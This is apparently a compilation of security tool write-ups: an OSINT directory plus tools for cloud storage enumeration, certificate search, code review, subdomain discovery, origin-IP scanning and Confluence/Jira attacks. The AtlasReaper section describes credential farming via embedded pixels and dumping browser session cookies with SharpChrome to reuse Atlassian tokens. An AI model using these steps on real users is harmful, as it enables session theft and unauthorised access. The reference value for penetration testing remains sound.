
I originally created this framework with an information security point of view. Since then, the response from other fields and disciplines has been incredible. I would love to be able to include any other OSINT resources, especially from fields outside of infosec. Please let me know about anything that might be missing!

Please visit the framework at the link below and good hunting!


https://osintframework.com

Legend

(T) - Indicates a link to a tool that must be installed and run locally
(D) - Google Dork, for more information: Google Hacking
(R) - Requires registration
(M) - Indicates a URL that contains the search term and the URL itself must be edited manually

For Update Notifications

Follow me on Twitter: @jnordine - https://twitter.com/jnordine
Watch or star the project on Github: https://github.com/lockfale/osint-framework

Suggestions, Comments, Feedback

Feedback or new tool suggestions are extremely welcome! Please feel free to submit a pull request, open an issue on GitHub, or reach out on Twitter.

Contribute with a GitHub Pull Request

For new resources, please ensure that the site is available for public and free use.

  1. Update the arf.json file in the format shown below. If this isn't the first entry for a folder, add a comma to the last closing brace of the previous entry.
  2. Submit a pull request!
  3. Thank you!

    OSINT Framework Website

    https://osintframework.com

    Happy Hunting!



    Goblob - A Fast Enumeration Tool For Publicly Exposed Azure Storage Blobs

    By: Zion3R


    Goblob is a lightweight and fast enumeration tool designed to aid in the discovery of sensitive information exposed publicly in Azure blobs, which can be useful for various research purposes such as vulnerability assessments, penetration testing, and reconnaissance.

    Warning. Goblob will issue individual goroutines for each container name to check in each storage account, only limited by the maximum number of concurrent goroutines specified in the -goroutines flag. This implementation can exhaust bandwidth pretty quickly in most cases with the default wordlist, or potentially cost you a lot of money if you're using the tool in a cloud environment. Make sure you understand what you are doing before running the tool.


    Installation

    go install github.com/Macmod/goblob@latest

    Usage

    To use goblob simply run the following command:

    $ ./goblob <storageaccountname>

    Where <storageaccountname> is the target storage account to enumerate public Azure blob storage URLs on.
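
    Under the hood, this class of tool checks whether candidate container URLs respond to an anonymous list request. A rough Python sketch of a single such check (the URL pattern is the standard Azure Blob Storage one; the account and container names are illustrative):

    import urllib.error
    import urllib.request

    account, container = "somestorageaccount", "backups"  # illustrative names
    url = f"https://{account}.blob.core.windows.net/{container}?restype=container&comp=list"

    try:
        # A 200 response to an anonymous list request means the container is public
        with urllib.request.urlopen(url, timeout=10) as resp:
            if resp.status == 200:
                print(f"[+] public container: {url}")
    except urllib.error.URLError:
        pass  # 403/404/NXDOMAIN etc. -> not publicly listable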

    You can also specify a list of storage account names to check:

    $ ./goblob -accounts accounts.txt

    By default, the tool will use a list of common Azure Blob Storage container names to construct potential URLs. However, you can also specify a custom list of container names using the -containers option. For example:

    $ ./goblob -accounts accounts.txt -containers wordlists/goblob-folder-names.txt

    The tool also supports outputting the results to a file using the -output option:

    $ ./goblob -accounts accounts.txt -containers wordlists/goblob-folder-names.txt -output results.txt

    If you want to provide accounts to test via stdin you can also omit -accounts (or the account name) entirely:

    $ cat accounts.txt | ./goblob

    Wordlists

    Goblob comes bundled with basic wordlists that can be used with the -containers option.

    Optional Flags

    Goblob provides several flags that can be tuned in order to improve the enumeration process:

    • -goroutines=N - Maximum number of concurrent goroutines to allow (default: 5000).
    • -blobs=true - Report the URL of each blob instead of the URL of the containers (default: false).
    • -verbose=N - Set verbosity level (default: 1, min: 0, max: 3).
    • -maxpages=N - Maximum of container pages to traverse looking for blobs (default: 20, set to -1 to disable limit or to 0 to avoid listing blobs at all and just check if the container is public)
    • -timeout=N - Timeout for HTTP requests (seconds, default: 90)
    • -maxidleconns=N - MaxIdleConns transport parameter for HTTP client (default: 100)
    • -maxidleconnsperhost=N - MaxIdleConnsPerHost transport parameter for HTTP client (default: 10)
    • -maxconnsperhost=N - MaxConnsPerHost transport parameter for HTTP client (default: 0)
    • -skipssl=true - Skip SSL verification (default: false)
    • -invertsearch=true - Enumerate accounts for each container instead of containers for each account (default: false)

    For instance, if you just want to find publicly exposed containers using large lists of storage accounts and container names, you should use -maxpages=0 to prevent the goroutines from paginating the results. Then run it again on the set of results you found with -blobs=true and -maxpages=-1 to actually get the URLs of the blobs.

    If, on the other hand, you want to test a small list of very popular container names against a large set of storage accounts, you might want to try -invertsearch=true with -maxpages=0, in order to see the public accounts for each container name instead of the container names for each storage account.

    You may also want to try changing -goroutines, -timeout and -maxidleconns, -maxidleconnsperhost and -maxconnsperhost and -skipssl in order to best use your bandwidth and find results faster.

    Experiment with the flags to find what works best for you ;-)

    Example


    Contributing

    Contributions are welcome by opening an issue or by submitting a pull request.

    TODO

    • Check blob domain for NXDOMAIN before trying wordlist to save bandwidth (maybe)
    • Improve default parameters for better performance

    Wordcloud

    An interesting visualization of popular container names found in my experiments with the tool:


    If you want to know more about my experiments and the subject in general, take a look at my article:



    CloudPulse - AWS Cloud Landscape Search Engine

    By: Zion3R


    During the reconnaissance phase, an attacker searches for any information about their target to create a profile that will later help them identify possible ways to get into an organization.
    CloudPulse is a powerful tool that simplifies and enhances the analysis of SSL certificate data. It leverages the extensive repository of SSL certificates obtained from the AWS EC2 machines available at Trickest Cloud. With CloudPulse, security researchers can efficiently explore SSL certificate details, uncover potential vulnerabilities, and gather valuable insights for a variety of security-related tasks.


    CloudPulse simplifies security assessments with a user-friendly interface. It allows you to effortlessly find a company's assets on the AWS cloud:

    • IPs
    • subdomains
    • domains associated with a target
    • organization name
    • discover origin IPs

    1- Download CloudPulse :

    git clone https://github.com/yousseflahouifi/CloudPulse
    cd CloudPulse/

    2- Run docker compose :

    docker-compose up -d

    3- Run script.py script

    docker-compose exec web python script.py

    4- Now go to http://localhost:8000/search and enjoy the search engine

    Alternatively, to set CloudPulse up without Docker:

    1- Download CloudPulse:

    git clone https://github.com/yousseflahouifi/CloudPulse
    cd CloudPulse/

    2- Setup virtual environment :

    python3 -m venv myenv
    source myenv/bin/activate

    3- Install requirements.txt file :

    pip install -r requirements.txt

    4- run an instance of elasticsearch using docker :

    docker run -d --name elasticsearch -p 9200:9200 -e "discovery.type=single-node" elasticsearch:6.6.1

    5- Update script.py and the settings file to use the host 'localhost':

    #script.py
    es = Elasticsearch([{'host': 'localhost', 'port': 9200}])

    #se/settings.py
    ELASTICSEARCH_DSL = {
        'default': {
            'hosts': 'localhost:9200'
        },
    }

    6- Run script.py to index data in elasticsearch:

    python script.py

    7- Run the app:

    python manage.py runserver 0:8000

    Included in the CloudPulse repository is a sample data.csv file containing close to 4,000 records, which provides a glimpse of the tool's capabilities. For the full dataset, visit the Trickest Cloud repository, clone the data, and update the data.csv file (it contains close to 9 million records).

    As an example, searching for .mil or for tesla returns the matching certificate records (screenshots in the original post).
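
    Since the data ends up in Elasticsearch, you can also query it directly from Python. A hedged sketch using the same client setup as above (the index name and query are illustrative; check the project's script.py for the actual index and mapping):

    from elasticsearch import Elasticsearch

    es = Elasticsearch([{'host': 'localhost', 'port': 9200}])

    # Full-text search across the indexed certificate records
    res = es.search(index="cloudpulse", body={
        "query": {"query_string": {"query": "tesla"}}
    })
    for hit in res["hits"]["hits"]:
        print(hit["_source"])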

    CloudPulse heavily depends on the data.csv file, which is a sample dataset extracted from the larger collection maintained by Trickest. While the sample dataset provides valuable insights, the tool's full potential is realized when used in conjunction with the complete dataset, which is accessible in the Trickest repository here.
    Users are encouraged to refer to the Trickest dataset for a more comprehensive and up-to-date analysis.



    DakshSCRA - Source Code Review Assist

    By: Zion3R


    The Daksh SCRA (Source Code Review Assist) tool is built to enhance the efficiency of the source code review process, providing a well-structured and organized approach for code reviewers.

    Rather than indiscriminately flagging everything as a potential issue, Daksh SCRA promotes thoughtful analysis, urging the investigation and confirmation of potential problems. This approach mitigates the scramble to tag every potential concern as a bug, cutting back on the confusion and wasted time spent on false positives.

    What sets Daksh SCRA apart is its emphasis on avoiding unnecessary bug tagging. Unlike conventional methods, it advocates for thorough investigation and confirmation of potential issues before tagging them as bugs. This approach helps mitigate the issue of false positives, which often consume valuable time and resources, thereby fostering a more productive and efficient code review process.


    Debut

    Daksh SCRA was initially introduced during a source code review training session I conducted at Black Hat USA 2022 (August 6 - 9), where it was subtly presented to a specific audience. However, this introduction was carried out with a low-profile approach, avoiding any major announcements.

    While this tool was quietly published on GitHub after the 2022 training, its official public debut took place at Black Hat USA 2023 in Las Vegas.

    Features and Functionalities

    Distinctive Features (Multiple World’s First)

    • Identifies Areas of Interest in Source Code: Encourage focused investigation and confirmation rather than indiscriminately labeling everything as a bug.

    • Identifies Areas of Interest in File Paths (World’s First): Recognises patterns in file paths to pinpoint relevant sections for review.

    • Software-Level Reconnaissance to Identify Technologies Utilised: Identifies project technologies, enabling code reviewers to conduct precise scans with appropriate rules.

    • Automated Scientific Effort Estimation for Code Review (World’s First): Providing a measurable approach for estimating efforts required for a code review process.

    Although this tool has progressed beyond its early stages, it has reached a functional state that is quite usable and delivers on its promised capabilities. Nevertheless, active enhancements are currently underway, and there are multiple new features and improvements expected to be added in the upcoming months.

    Additionally, the tool offers the following functionalities:

    • Options to use platform-specific rules for finding areas of interest
    • Options to extend or add new rules for any new or existing languages
    • Generates reports in text, HTML and PDF formats for inspection

    Refer to the wiki for the tool setup and usage details - https://github.com/coffeeandsecurity/DakshSCRA/wiki

    Feel free to contribute towards updating or adding new rules and future development.

    If you find any bugs, report them to d3basis.m0hanty@gmail.com.

    Tool Setup

    Pre-requisites

    Python3 and all the libraries listed in requirements.txt

    Setting up environment to run this tool

    1. Setup a virtual environment

    $ pip install virtualenv

    $ virtualenv -p python3 {name-of-virtual-env} // Create a virtualenv
    Example: virtualenv -p python3 venv

    $ source {name-of-virtual-env}/bin/activate // To activate virtual environment you just created
    Example: source venv/bin/activate

    After running the activate command you should see the name of your virtual env at the beginning of your terminal like this: (venv) $

    2. Ensure all required libraries are installed within the virtual environment

    You must run the below command after activating the virtual environment as mentioned in the previous steps.

    pip install -r requirements.txt

    Once the above step successfully installs all the required libraries, refer to the following tool usage commands to run the tool.

    Tool Usage

    $ python3 dakshscra.py -h // To view available options and arguments

    usage: dakshscra.py [-h] [-r RULE_FILE] [-f FILE_TYPES] [-v] [-t TARGET_DIR] [-l {R,RF}] [-recon] [-estimate]

    options:
    -h, --help show this help message and exit
    -r RULE_FILE Specify platform specific rule name
    -f FILE_TYPES Specify file types to scan
    -v Specify verbosity level {'-v', '-vv', '-vvv'}
    -t TARGET_DIR Specify target directory path
    -l {R,RF}, --list {R,RF}
    List rules [R] OR rules and filetypes [RF]
    -recon Detects platform, framework and programming language used
    -estimate Estimate efforts required for code review

    Example Usage

    $ python3 dakshscra.py // To view tool usage along with examples

    Examples:
    # '-f' is optional. If not specified, it will default to the corresponding filetypes of the selected rule.
    dakshscra.py -r php -t /source_dir_path

    # To override default settings, other filetypes can be specified with '-f' option.
    dakshscra.py -r php -f dotnet -t /path_to_source_dir
    dakshscra.py -r php -f custom -t /path_to_source_dir

    # Perform reconnaissance and rule based scanning if '-recon' used with '-r' option.
    dakshscra.py -recon -r php -t /path_to_source_dir

    # Perform only reconnaissance if '-recon' used without the '-r' option.
    dakshscra.py -recon -t /path_to_source_dir

    # Verbosity: '-v' is default, '-vvv' will display all rules check within each rule category.
    dakshscra.py -r php -vv -t /path_to_source_dir


    Supported RULE_FILE: dotnet, java, php, javascript
    Supported FILE_TYPES: dotnet, php, java, custom, allfiles

    Reports

    The tool generates reports in three formats: HTML, PDF, and TEXT. Although the HTML and PDF reports are still being improved, they are currently in a reasonably good state. With each subsequent iteration, these reports will continue to be refined and improved even further.

    Scanning (Areas of Security Concerns) Report

    HTML Report:
    • DakshSCRA/reports/html/report.html
    PDF Report:
    • DakshSCRA/reports/html/report.pdf
    RAW TEXT Based Reports:
    • Areas of Interest - Identified Patterns : DakshSCRA/reports/text/areas_of_interest.txt
    • Areas of Interest - Project Files: DakshSCRA/reports/text/filepaths_aoi.txt
    • Identified Project Files: DakshSCRA/runtime/filepaths.txt

    Reconnaissance (Recon) Report

    • Reconnaissance Summary: /reports/text/recon.txt

    Note: Currently, the reconnaissance report is created in a text format. However, in upcoming releases, the plan is to incorporate it into the vulnerability scanning report, which will be available in both HTML and PDF formats.

    Code Review Effort Estimation Report

    • Effort estimation report: /reports/html/estimation.html

    Note: At present, the effort estimation for the source code review is in its early stages. It is considered experimental and will be developed and refined through several iterations. Improvements will be made over multiple releases, as the formula and the concept are new and require time to be honed to achieve accuracy or reasonable estimation.

    Currently, the report is generated in HTML format. However, in future releases, there are plans to also provide it in PDF format.



    AtlasReaper - A Command-Line Tool For Reconnaissance And Targeted Write Operations On Confluence And Jira Instances

    By: Zion3R



    AtlasReaper is a command-line tool developed for offensive security purposes, primarily focused on reconnaissance of Confluence and Jira. It also provides various features that can be helpful for tasks such as credential farming and social engineering. The tool is written in C#.


    Blog post: Sowing Chaos and Reaping Rewards in Confluence and Jira

                                                       .@@@@
    @@@@@
    @@@@@ @@@@@@@
    @@@@@ @@@@@@@@@@@
    @@@@@ @@@@@@@@@@@@@@@
    @@@@, @@@@ *@@@@
    @@@@ @@@ @@ @@@ .@@@
    _ _ _ ___ @@@@@@@ @@@@@@
    /_\| |_| |__ _ __| _ \___ __ _ _ __ ___ _ _ @@ @@@@@@@@
    / _ \ _| / _` (_-< / -_) _` | '_ \/ -_) '_| @@ @@@@@@@@
    /_/ \_\__|_\__,_/__/_|_\___\__,_| .__/\___|_| @@@@@@@@ &@
    |_| @@@@@@@@@@ @@&
    @@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@. @@
    @werdhaihai

    Usage

    AtlasReaper uses commands, subcommands, and options. The format for executing commands is as follows:

    .\AtlasReaper.exe [command] [subcommand] [options]

    Replace [command], [subcommand], and [options] with the appropriate values based on the action you want to perform. For more information about each command or subcommand, use the -h or --help option.

    Below is a list of available commands and subcommands:

    Commands

    Each command has subcommands for interacting with the specific product.

    • confluence
    • jira

    Subcommands

    Confluence

    • confluence attach - Attach a file to a page.
    • confluence download - Download an attachment.
    • confluence embed - Embed a 1x1 pixel image to perform farming attacks.
    • confluence link - Add a link to a page.
    • confluence listattachments - List attachments.
    • confluence listpages - List pages in Confluence.
    • confluence listspaces - List spaces in Confluence.
    • confluence search - Search Confluence.

    Jira

    • jira addcomment - Add a comment to an issue.
    • jira attach - Attach a file to an issue.
    • jira createissue - Create a new issue.
    • jira download - Download attachment(s) from an issue.
    • jira listattachments - List attachments on an issue.
    • jira listissues - List issues in Jira.
    • jira listprojects - List projects in Jira.
    • jira listusers - List Atlassian users.
    • jira searchissues - Search issues in Jira.

    Common Commands

    • help - Display more information on a specific command.

    Examples

    Here are a few examples of how to use AtlasReaper:

    • Search for a keyword in Confluence with wildcard search:

      .\AtlasReaper.exe confluence search --query "http*example.com*" --url $url --cookie $cookie

    • Attach a file to a page in Confluence:

      .\AtlasReaper.exe confluence attach --page-id "12345" --file "C:\path\to\file.exe" --url $url --cookie $cookie

    • Create a new issue in Jira:

      .\AtlasReaper.exe jira createissue --project "PROJ" --issue-type Task --message "I can't access this link from my host" --url $url --cookie $cookie

    Authentication

    Confluence and Jira can be configured to allow anonymous access. You can check this by omitting the -c/--cookie option from the commands.

    In the event authentication is required, you can dump cookies from a user's browser with SharpChrome or another similar tool.

    1. .\SharpChrome.exe cookies /showall

    2. Look for any cookies scoped to *.atlassian.net named cloud.session.token or tenant.session.token
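
    For context, that session cookie is what authenticates requests against the Atlassian REST APIs the tool wraps. A rough Python equivalent of a Confluence search with a harvested cookie (the endpoint follows the public Confluence Cloud REST API; the tenant, token, and CQL query are illustrative):

    import requests

    url = "https://example.atlassian.net/wiki/rest/api/content/search"
    cookies = {"cloud.session.token": "<token from the browser dump>"}

    resp = requests.get(url, cookies=cookies, params={"cql": 'text ~ "password"'})
    for result in resp.json().get("results", []):
        print(result.get("title"))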

    Limitations

    Please note the following limitations of AtlasReaper:

    • The tool has not been thoroughly tested in all environments, so it's possible to encounter crashes or unexpected behavior. Efforts have been made to minimize these issues, but caution is advised.
    • AtlasReaper uses the cloud.session.token or tenant.session.token which can be obtained from a user's browser. Alternatively, it can use anonymous access if permitted. (API tokens or other auth is not currently supported)
    • For write operations, the username associated with the user session token (or "anonymous") will be listed.

    Contributing

    If you encounter any issues or have suggestions for improvements, please feel free to contribute by submitting a pull request or opening an issue in the AtlasReaper repo.



    Xsubfind3R - A CLI Utility To Find A Domain's Known Subdomains From Curated Passive Online Sources

    By: Zion3R


    xsubfind3r is a command-line interface (CLI) utility to find a domain's known subdomains from curated passive online sources.


    Features

    • Fetches domains from curated passive sources to maximize results.

    • Supports stdin and stdout for easy integration into workflows.

    • Cross-Platform (Windows, Linux & macOS).

    Installation

    Install release binaries (Without Go Installed)

    Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

    • ...with wget:

       wget https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz
    • ...or, with curl:

       curl -OL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz

    ...then, extract the binary:

    tar xf xsubfind3r-<version>-linux-amd64.tar.gz

    TIP: The above steps, download and extract, can be combined into a single step with this one-liner:

    curl -sL https://github.com/hueristiq/xsubfind3r/releases/download/v<version>/xsubfind3r-<version>-linux-amd64.tar.gz | tar -xzv

    NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xsubfind3r executable.

    ...move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

    sudo mv xsubfind3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.

    Install source (With Go Installed)

    Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

    go install ...

    go install -v github.com/hueristiq/xsubfind3r/cmd/xsubfind3r@latest

    go build ... the development version

    • Clone the repository

       git clone https://github.com/hueristiq/xsubfind3r.git 
    • Build the utility

       cd xsubfind3r/cmd/xsubfind3r && \
      go build .
    • Move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

       sudo mv xsubfind3r /usr/local/bin/

      NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.

    NOTE: While the development version is a good way to take a peek at xsubfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

    Post Installation

    xsubfind3r will work right after installation. However, BeVigil, Chaos, Fullhunt, GitHub, Intelligence X and Shodan require API keys to work, and URLScan supports an API key but does not require one. The API keys are stored in the $HOME/.hueristiq/xsubfind3r/config.yaml file - created upon first run - which uses the YAML format. Multiple API keys can be specified for each of these sources, from which one will be used.

    Example config.yaml:

    version: 0.3.0
    sources:
        - alienvault
        - anubis
        - bevigil
        - chaos
        - commoncrawl
        - crtsh
        - fullhunt
        - github
        - hackertarget
        - intelx
        - shodan
        - urlscan
        - wayback
    keys:
        bevigil:
            - awA5nvpKU3N8ygkZ
        chaos:
            - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39asdsd54bbc1aabb208c9acfb
        fullhunt:
            - 0d9652ce-516c-4315-b589-9b241ee6dc24
        github:
            - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
            - asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
        intelx:
            - 2.intelx.io:00000000-0000-0000-0000-000000000000
        shodan:
            - AAAAClP1bJJSRMEYJazgwhJKrggRwKA
        urlscan:
            - d4c85d34-e425-446e-d4ab-f5a3412acbe8

    Usage

    To display help message for xsubfind3r use the -h flag:

    xsubfind3r -h

    help message:


    _ __ _ _ _____
    __ _____ _ _| |__ / _(_)_ __ __| |___ / _ __
    \ \/ / __| | | | '_ \| |_| | '_ \ / _` | |_ \| '__|
    > <\__ \ |_| | |_) | _| | | | | (_| |___) | |
    /_/\_\___/\__,_|_.__/|_| |_|_| |_|\__,_|____/|_| v0.3.0

    USAGE:
    xsubfind3r [OPTIONS]

    INPUT:
    -d, --domain string[] target domains
    -l, --list string target domains' list file path

    SOURCES:
    --sources bool list supported sources
    -u, --sources-to-use string[] comma(,) separated sources to use
    -e, --sources-to-exclude string[] comma(,) separated sources to exclude

    OPTIMIZATION:
    -t, --threads int number of threads (default: 50)

    OUTPUT:
    --no-color bool disable colored output
    -o, --output string output subdomains' file path
    -O, --output-directory string output subdomains' directory path
    -v, --verbosity string debug, info, warning, error, fatal or silent (default: info)

    CONFIGURATION:
    -c, --configuration string configuration file path (default: ~/.hueristiq/xsubfind3r/config.yaml)

    Contribution

    Issues and Pull Requests are welcome! Check out the contribution guidelines.

    Licensing

    This utility is distributed under the MIT license.



    Chaos - Origin IP Scanning Utility Developed With ChatGPT

    By: Zion3R


    chaos is an 'origin' IP scanner developed by RST in collaboration with ChatGPT. It is a niche utility with an intended audience of mostly penetration testers and bug hunters.

    An origin-IP is a term-of-art expression describing the final public IP destination for websites that are publicly served via 3rd parties. If you'd like to understand more about why anyone might be interested in Origin-IPs, please check out our blog post.

    chaos was rapidly prototyped from idea to functional proof-of-concept in less than 24 hours using our principles of DevOps with ChatGPT.
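
    The core check chaos automates is simple: request the site directly from a candidate IP while sending the real hostname in the Host header, and see whether the origin answers. A bare-bones Python version of a single such test (illustrative values, not chaos's code):

    import requests

    fqdn, ip, port = "www.example.com", "203.0.113.10", 443  # illustrative values

    resp = requests.get(
        f"https://{ip}:{port}/",
        headers={"Host": fqdn},
        verify=False,  # the certificate will match the FQDN, not the bare IP
        timeout=5,
    )
    print(resp.status_code, resp.reason)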

    usage: chaos.py [-h] -f FQDN -i IP [-a AGENT] [-C] [-D] [-j JITTER] [-o OUTPUT] [-p PORTS] [-P] [-r] [-s SLEEP] [-t TIMEOUT] [-T] [-v] [-x] 
    _..._
    .-'` `'-.
    __|___________|__
    \ /
    `._ CHAOS _.'
    `-------`
    / \\
    / \\
    / \\
    / \\
    / \\
    / \\
    / \\
    / \\
    / \\
    /_____________________\\
    CHAtgpt Origin-ip Scanner
    _______ _______ _______ _______ _______
    |\\ /|\\ /|\\ /|\\ /|\\/|
    | +---+ | +---+ | +---+ | +---+ | +---+ |
    | |H | | |U | | |M | | |A | | |N | |
    | |U | | |S | | |A | | |N | | |C | |
    | |M | | |E | | |N | | |D | | |O | |
    | |A | | |R | | |C | | | | | |L | |
    | +---+ | +---+ | +---+ | +---+ | +---+ |
    |/_____|\\_____|\\_____|\\_____|\\_____\\

    Origin IP Scanner developed with ChatGPT
    cha*os (n): complete disorder and confusion
    (ver: 0.9.4)


    Features

    • Threaded for performance gains
    • Real-time status updates and progress bars, nice for large scans ;)
    • Flexible user options for various scenarios & constraints
    • Dataset reduction for improved scan times
    • Easy to use CSV output

    Installation

    1. Download / clone / unzip / whatever
    2. cd path/to/chaos
    3. pip3 install -U pip setuptools virtualenv
    4. virtualenv env
    5. source env/bin/activate
    6. (env) pip3 install -U -r ./requirements.txt
    7. (env) ./chaos.py -h

    Options

    -h, --help            show this help message and exit
    -f FQDN, --fqdn FQDN Path to FQDN file (one FQDN per line)
    -i IP, --ip IP IP address(es) for HTTP requests (Comma-separated IPs, IP networks, and/or files with IP/network per line)
    -a AGENT, --agent AGENT
    User-Agent header value for requests
    -C, --csv Append CSV output to OUTPUT_FILE.csv
    -D, --dns Perform fwd/rev DNS lookups on FQDN/IP values prior to request; no impact to testing queue
    -j JITTER, --jitter JITTER
    Add a 0-N second randomized delay to the sleep value
    -o OUTPUT, --output OUTPUT
    Append console output to FILE
    -p PORTS, --ports PORTS
    Comma-separated list of TCP ports to use (default: "80,443")
    -P, --no-prep Do not pre-scan each IP/port with `GET /` using `Host: {IP:Port}` header to eliminate unresponsive hosts
    -r, --randomize Randomize(ish) the order IPs/ports are tested
    -s SLEEP, --sleep SLEEP
    Add N seconds before thread completes
    -t TIMEOUT, --timeout TIMEOUT
    Wait N seconds for an unresponsive host
    -T, --test Test-mode; don't send requests
    -v, --verbose Enable verbose output
    -x, --singlethread Single threaded execution; for 1-2 core systems; default threads=(cores-1) if cores>2

    Examples

    Localhost Testing

    Launch python HTTP server

    % python3 -u -m http.server 8001
    Serving HTTP on :: port 8001 (http://[::]:8001/) ...

    Launch ncat as HTTP on a port detected as SSL; use a loop because --keep-open can hang

    % while true; do ncat -lvp 8443 -c 'printf "HTTP/1.0 204 Plaintext OK\n\n<html></html>\n"'; done
    Ncat: Version 7.94 ( https://nmap.org/ncat )
    Ncat: Listening on [::]:8443
    Ncat: Listening on 0.0.0.0:8443

    Also launch ncat as SSL on a port that will default to HTTP detection

    % while true; do ncat --ssl -lvp 8444 -c 'printf "HTTP/1.0 202 OK\n\n<html></html>\n"'; done    
    Ncat: Version 7.94 ( https://nmap.org/ncat )
    Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
    Ncat: SHA-1 fingerprint: 0208 1991 FA0D 65F0 608A 9DAB A793 78CB A6EC 27B8
    Ncat: Listening on [::]:8444
    Ncat: Listening on 0.0.0.0:8444

    Prepare an FQDN file:

    % cat ../test_localhost_fqdn.txt 
    www.example.com
    localhost.example.com
    localhost.local
    localhost
    notreally.arealdomain

    Prepare an IP file / list:

    % cat ../test_localhost_ips.txt 
    127.0.0.1
    127.0.0.0/29
    not_an_ip_addr
    -6.a
    =4.2
    ::1

    Run the scan

    • Note an IPv6 network added to IPs on the CLI
    • -p to specify the ports we are listening on
    • -x for single threaded run to give our ncat servers time to restart
    • -s0.2 short sleep for our ncat servers to restart
    • -t1 to timeout after 1 second
    % ./chaos.py -f ../test_localhost_fqdn.txt -i ../test_localhost_ips.txt,::1/126 -p 8001,8443,8444 -x -s0.2 -t1   
    2023-06-21 12:48:33 [WARN] Ignoring invalid FQDN value: localhost.local
    2023-06-21 12:48:33 [WARN] Ignoring invalid FQDN value: localhost
    2023-06-21 12:48:33 [WARN] Ignoring invalid FQDN value: notreally.arealdomain
    2023-06-21 12:48:33 [WARN] Error: invalid IP address or CIDR block =4.2
    2023-06-21 12:48:33 [WARN] Error: invalid IP address or CIDR block -6.a
    2023-06-21 12:48:33 [WARN] Error: invalid IP address or CIDR block not_an_ip_addr
    2023-06-21 12:48:33 [INFO] * ---- <META> ---- *
    2023-06-21 12:48:33 [INFO] * Version: 0.9.4
    2023-06-21 12:48:33 [INFO] * FQDN file: ../test_localhost_fqdn.txt
    2023-06-21 12:48:33 [INFO] * FQDNs loaded: ['www.example.com', 'localhost.example.com']
    2023-06-21 12:48:33 [INFO] * IP input value(s): ../test_localhost_ips.txt,::1/126
    2023-06-21 12:48:33 [INFO] * Addresses parsed from IP inputs: 12
    2023-06-21 12:48:33 [INFO] * Port(s): 8001,8443,8444
    2023-06-21 12:48:33 [INFO] * Thread(s): 1
    2023-06-21 12:48:33 [INFO] * Sleep value: 0.2
    2023-06-21 12:48:33 [INFO] * Timeout: 1.0
    2023-06-21 12:48:33 [INFO] * User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 ch4*0s/0.9.4
    2023-06-21 12:48:33 [INFO] * ---- </META> ---- *
    2023-06-21 12:48:33 [INFO] 36 unique address/port addresses for testing
    Prep Tests: 100%|████████████████████████████████| 36/36 [00:29<00:00, 1.20it/s]
    2023-06-21 12:49:03 [INFO] 9 IP/ports verified, reducing test dataset from 72 entries
    2023-06-21 12:49:03 [INFO] 18 pending tests remain after pre-testing
    2023-06-21 12:49:03 [INFO] Queuing 18 threads
    ++RCVD++ (200 OK) www.example.com @ :::8001
    ++RCVD++ (204 Plaintext OK) www.example.com @ :::8443
    ++RCVD++ (202 OK) www.example.com @ :::8444
    ++RCVD++ (200 OK) www.example.com @ ::1:8001
    ++RCVD++ (204 Plaintext OK) www.example.com @ ::1:8443
    ++RCVD++ (202 OK) www.example.com @ ::1:8444
    ++RCVD++ (200 OK) www.example.com @ 127.0.0.1:8001
    ++RCVD++ (204 Plaintext OK) www.example.com @ 127.0.0.1:8443
    ++RCVD++ (202 OK) www.example.com @ 127.0.0.1:8444
    ++RCVD++ (200 OK) localhost.example.com @ :::8001
    ++RCVD++ (204 Plaintext OK) localhost.example.com @ :::8443
    ++RCVD++ (202 OK) localhost.example.com @ :::8444
    ++RCVD++ (200 OK) localhost.example.com @ ::1:8001
    ++RCVD++ (204 Plaintext OK) localhost.example.com @ ::1:8443
    ++RCVD++ (202 OK) localhost.example.com @ ::1:8444
    ++RCVD++ (200 OK) localhost.example.com @ 127.0.0.1:8001
    ++RCVD++ (204 Plaintext OK) localhost.example.com @ 127.0.0.1:8443
    ++RCVD++ (202 OK) localhost.example.com @ 127.0.0.1:8444
    Origin Scan: 100%|████████████████████████████████| 18/18 [00:06<00:00, 2.76it/s]
    2023-06-21 12:49:09 [RSLT] Results from 5 FQDNs:
    ::1
    ::1:8444 => (202 / OK)
    ::1:8443 => (204 / Plaintext OK)
    ::1:8001 => (200 / OK)

    127.0.0.1
    127.0.0.1:8001 => (200 / OK)
    127.0.0.1:8443 => (204 / Plaintext OK)
    127.0.0.1:8444 => (202 / OK)

    ::
    :::8001 => (200 / OK)
    :::8443 => (204 / Plaintext OK)
    :::8444 => (202 / OK)

    www.example.com
    :::8001 => (200 / OK)
    :::8443 => (204 / Plaintext OK)
    :::8444 => (202 / OK)
    ::1:8001 => (200 / OK)
    ::1:8443 => (204 / Plaintext OK)
    ::1:8444 => (202 / OK)
    127.0.0.1:8001 => (200 / OK)
    127.0.0.1:8443 => (204 / Plaintext OK)
    127.0.0.1:8444 => (202 / OK)

    localhost.example.com
    :::8001 => (200 / OK)
    :::8443 => (204 / Plaintext OK)
    :::8444 => (202 / OK)
    ::1:8001 => (200 / OK)
    ::1:8443 => (204 / Plaintext OK)
    ::1:8444 => (202 / OK)
    127.0.0.1:8001 => (200 / OK)
    127.0.0.1:8443 => (204 / Plaintext OK)
    127.0.0.1:8444 => (202 / OK)


    rst@r57 chaos %

    Test & Verbose localhost

    -T runs in test mode (do everything except send requests)

    -v verbose option provides additional output


    Known Defects

